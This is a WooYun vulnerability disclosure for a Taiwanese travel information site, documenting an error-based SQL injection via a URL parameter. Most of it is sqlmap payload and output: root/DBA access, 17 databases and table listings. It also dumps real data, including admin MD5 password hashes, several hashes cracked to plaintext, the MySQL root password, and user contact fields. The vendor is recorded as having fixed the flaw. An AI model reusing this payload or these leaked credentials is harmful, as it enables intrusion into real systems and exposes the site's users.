当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157949

漏洞标题:清境旅遊資訊網主站sql注入漏洞(dba权限/涉及17裤/影响近500用户帐号/md5可解密)(臺灣地區)

相关厂商:清境旅遊資訊網

漏洞作者: 路人甲

提交时间:2015-12-04 15:41

修复时间:2016-01-05 19:11

公开时间:2016-01-05 19:11

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态: 已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-04: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

清境旅遊資訊網主站sql注入漏洞(dba权限/涉及17裤/影响近500用户帐号/md5可解密)

详细说明:

0x01
注入点

http://**.**.**.**/sub/hotelview.asp?hno=182


500报错注入

FNQBH_AIF3$MK5BURWICN1M.png


0x02
root用户

Place: GET
Parameter: hno
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: hno=182 AND (SELECT 3471 FROM(SELECT COUNT(*),CONCAT(0x3a7878793a
SELECT (CASE WHEN (3471=3471) THEN 1 ELSE 0 END)),0x3a716b6e3a,FLOOR(RAND(0)*2
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[13:19:35] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
[13:19:35] [INFO] fetching current user
[13:19:36] [INFO] retrieved: root@localhost
current user:    'root@localhost'


0x03
还是dba权限

[13:20:47] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: MySQL 5.0
[13:20:47] [INFO] testing if current user is DBA
[13:20:47] [INFO] fetching current user
[13:20:47] [INFO] resumed: root@localhost
[13:20:47] [INFO] retrieved: 1
current user is DBA:    'True'


0x04
涉及17裤

available databases [17]:
[*] cja
[*] db
[*] dbcount
[*] dbforguestbooks
[*] dbforhotel
[*] dbformb
[*] dbformbbooks
[*] dbforpanel
[*] dbforweb
[*] dbforwork
[*] download
[*] imagebooks
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] user


影响用户

Database: dbforhotel
[78 tables]
+-----------------+
| ad              |
| ad_news         |
| ad_set          |
| admrun          |
| album           |
| album_photo     |
| banner          |
| bannertype      |
| cafe            |
| cafepic         |
| consultation    |
| coupon          |
| couponstyle     |
| culture         |
| epaper          |
| excelfile       |
| gbooksset       |
| guide           |
| guidepic        |
| hhotelnews      |
| hightrip        |
| hightripic      |
| hlink           |
| holiday         |
| holiday_memo    |
| hotel           |
| hpictext        |
| keyword         |
| keyword_t       |
| l_map           |
| link            |
| link_friend     |
| linkclass       |
| login           |
| mail            |
| mailclass       |
| mappost         |
| maprepost       |
| menubutton      |
| menubuttonclass |
| message         |
| mountainphoto   |
| nature          |
| newsad          |
| newsad_1        |
| newskeyword     |
| order_room      |
| order_room_set  |
| photo           |
| present         |
| project         |
| restaurant      |
| restaurantpic   |
| room            |
| room_number     |
| roomlive        |
| roomlive1       |
| roomliveday     |
| sendmail        |
| service         |
| setting         |
| shop            |
| shopic          |
| shownk          |
| showphoto       |
| sitemap         |
| sitemapclass    |
| specialty       |
| sub_news        |
| sub_p           |
| traffic_need    |
| trafficservice  |
| trip            |
| trip_turn       |
| tripic          |
| triplan         |
| triplanday      |
| worknew         |
+-----------------+


Table: login
[22 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| lAddress     | varchar(255) |
| lBirthday    | datetime     |
| lCreatTime   | datetime     |
| lEarning     | varchar(1)   |
| lEducation   | varchar(1)   |
| lEmail       | varchar(100) |
| lEnable      | varchar(1)   |
| lGender      | varchar(1)   |
| lHasChildren | varchar(1)   |
| lHobby       | varchar(2)   |
| lLoginTime   | datetime     |
| lMarriage    | varchar(1)   |
| lMobile      | varchar(25)  |
| lName        | varchar(100) |
| lNickname    | varchar(10)  |
| lNo          | int(11)      |
| lOccupation  | varchar(2)   |
| lPassword    | varchar(32)  |
| lSSN         | varchar(10)  |
| lssnRadio    | varchar(1)   |
| lSubscribe   | varchar(1)   |
| lTel         | varchar(25)  |
+--------------+--------------+


268名,涉及邮箱,手机号码,登入地址等等

Database: dbforhotel
+-------+---------+
| Table | Entries |
+-------+---------+
| login | 146     |
+-------+---------+


+-------+---------+
| Table | Entries |
+-------+---------+
| login | 268     |
+-------+---------+


Database: cja
+---------+---------+
| Table   | Entries |
+---------+---------+
| cjauser | 22      |
+---------+---------+


14:01:05] [INFO] retrieved: 0956-993031
14:01:05] [INFO] retrieved: http://**.**.**.**/
14:01:05] [INFO] retrieved: dddddd
14:01:05] [INFO] retrieved: athena20070131u.doc
14:01:06] [INFO] retrieved: ddddd
14:01:06] [INFO] retrieved: ccss
14:01:06] [INFO] retrieved: ../index.asp
14:01:06] [INFO] retrieved:
14:01:07] [INFO] retrieved: ????????????80?
14:01:07] [INFO] retrieved:
14:01:07] [INFO] retrieved: 2006-10-02 19:52:42
14:01:07] [INFO] retrieved:
14:01:07] [INFO] retrieved:
14:01:08] [INFO] retrieved: www.jiamaei@**.**.**.**
14:01:08] [INFO] retrieved: 0
14:01:08] [INFO] retrieved:
14:01:08] [INFO] retrieved:
14:01:09] [INFO] retrieved:
14:01:09] [INFO] retrieved: 2010-09-08 07:42:29
14:01:09] [INFO] retrieved:
14:01:09] [INFO] retrieved:
14:01:10] [INFO] retrieved: ????
14:01:10] [INFO] retrieved:
14:01:10] [INFO] retrieved: 2
14:01:10] [INFO] retrieved:
14:01:10] [INFO] retrieved: 4291eca9f56529f463d90f7e35278568
14:01:11] [INFO] retrieved:
14:01:11] [INFO] retrieved: 1
14:01:11] [INFO] retrieved: 049-2803940
14:01:11] [INFO] retrieved: 049-2803941
14:01:12] [INFO] retrieved: jiamaei
14:01:12] [INFO] retrieved: d01d02d03d08d09d10d11d12d13d18d19d20d21
14:01:12] [INFO] retrieved: ??????????
14:01:12] [INFO] retrieved:
14:01:13] [INFO] retrieved: 2010-08-31 00:00:00
14:01:13] [INFO] retrieved: 2010-07-10 00:00:00


贴出部分管理员用户

[22 entries]
+-------+-------+---------------------+----------+---------+--------+------+----
-------------------------------------+-------+
| cuAdm | cuBaB | cuCreatTime         | cuEnable | cuID    | cuName | cuNo | cuP
assword                              | cuRes |
+-------+-------+---------------------+----------+---------+--------+------+----
-------------------------------------+-------+
| 0     | 1     | 2006-08-10 16:36:36 | 1        | 401     | ?????? | 2    | 816
b112c6105b3ebd537828a39af4818 (401)  | 0     |
| 0     | 1     | 2006-08-16 09:16:29 | 1        | 402     | ???    | 14   | 69c
b3ea317a32c4e6143e665fdb20b14 (402)  | 1     |
| 0     | 0     | 2006-08-16 09:45:06 | 1        | 403     | ?????? | 15   | bbf
94b34eb32268ada57a3be5062fe7d        | 0     |
| 0     | 0     | 2006-08-17 14:30:40 | 1        | 404     | ???    | 21   | 4f4
adcbf8c6f66dcfc8a3282ac2bf10a        | 0     |
| 0     | 0     | 2006-08-18 10:24:08 | 1        | 405     | ????   | 22   | bbc
bff5c1f1ded46c25d28119a85c6c2        | 0     |
| 0     | 1     | 2006-08-18 11:02:35 | 1        | 406     | ????   | 23   | 8cb
22bdd0b7ba1ab13d742e22eed8da2 (406)  | 0     |
| 0     | 1     | 2006-08-18 11:29:26 | 1        | 407     | ???    | 24   | f4f
6dce2f3a0f9dada0c2b5b66452017        | 0     |
| 0     | 1     | 2006-08-18 11:37:15 | 1        | 408     | ????   | 25   | 0d0
fd7c6e093f7b804fa0150b875b868        | 0     |
| 0     | 1     | 2006-08-18 11:47:12 | 1        | 409     | ????   | 26   | a96
b65a721e561e1e3de768ac819ffbb (409)  | 0     |
| 0     | 0     | 2006-08-18 11:55:38 | 1        | 410     | ????   | 27   | 106
8c6e4c8051cfd4e9ea8072e3189e2        | 0     |
| 0     | 0     | 2006-08-18 12:08:59 | 1        | 411     | ?????  | 28   | 17d
63b1625c816c22647a73e1482372b (411)  | 0     |
| 0     | 0     | 2006-08-18 12:16:10 | 1        | 412     | ????   | 29   | b92
28e0962a78b84f3d5d92f4faa000b        | 0     |
| 0     | 0     | 2006-08-18 12:29:41 | 1        | 413     | ????   | 30   | 0de
b1c54814305ca9ad266f53bc82511 (413)  | 0     |
| 0     | 0     | 2006-08-15 09:58:30 | 1        | 501     | ???    | 13   | 5b6
9b9cb83065d403869739ae7f0995e (501)  | 1     |
| 0     | 0     | 2006-08-17 08:58:11 | 1        | 502     | ???    | 16   | b33
7e84de8752b27eda3a12363109e80 (504)  | 1     |
| 0     | 1     | 2006-08-17 09:59:21 | 1        | 503     | ????   | 17   | b33
7e84de8752b27eda3a12363109e80 (504)  | 1     |
| 0     | 1     | 2006-08-17 10:10:01 | 1        | 504     | ????   | 18   | b33
7e84de8752b27eda3a12363109e80 (504)  | 1     |
| 0     | 1     | 2006-08-17 10:13:51 | 1        | 505     | ????   | 19   | e8c
0653fea13f91bf3c48159f7c24f78        | 1     |
| 0     | 0     | 2006-08-18 15:28:57 | 1        | 506     | ???    | 31   | ff4
d5fbbafdf976cfdc032e3bde78de5 (506)  | 0     |
| 1     | 0     | 2006-08-19 14:16:55 | 1        | adm2006 | adm    | 32   | a4f
a8d76cc8d25e6e1ad5a772dd951a5        | 0     |
| 1     | 0     | 2006-08-10 15:47:17 | 1        | arch    | ????   | 1    | d61
94c68fcc7e79bb57401be603cb1cc (arch) | 0     |
| 1     | 0     | 2008-09-20 15:14:16 | 1        | sunny   | sunny  | 33   | 418
7db82d9b3c103dc996029dd723f55        | 0     |
+-------+-------+---------------------+----------+---------+--------+------+----
-------------------------------------+-------+


随便贴出两枚cmd5官网解密的: sunny rich230
arch arch
adm adm2006
5枚数据库用户

[13:49:50] [INFO] retrieved: 5
Database: mysql
+-------+---------+
| Table | Entries |
+-------+---------+
| user  | 5       |
+-------+---------+


包含

root  root


0x05
还存在文件上传,看了半天没看懂
http://**.**.**.**/tmpuugvi.asp

49U@WD%79LAOG98W`A25{0F.png



漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-08 06:15

厂商回复:

感謝通報

最新状态:

2016-01-05:確認修復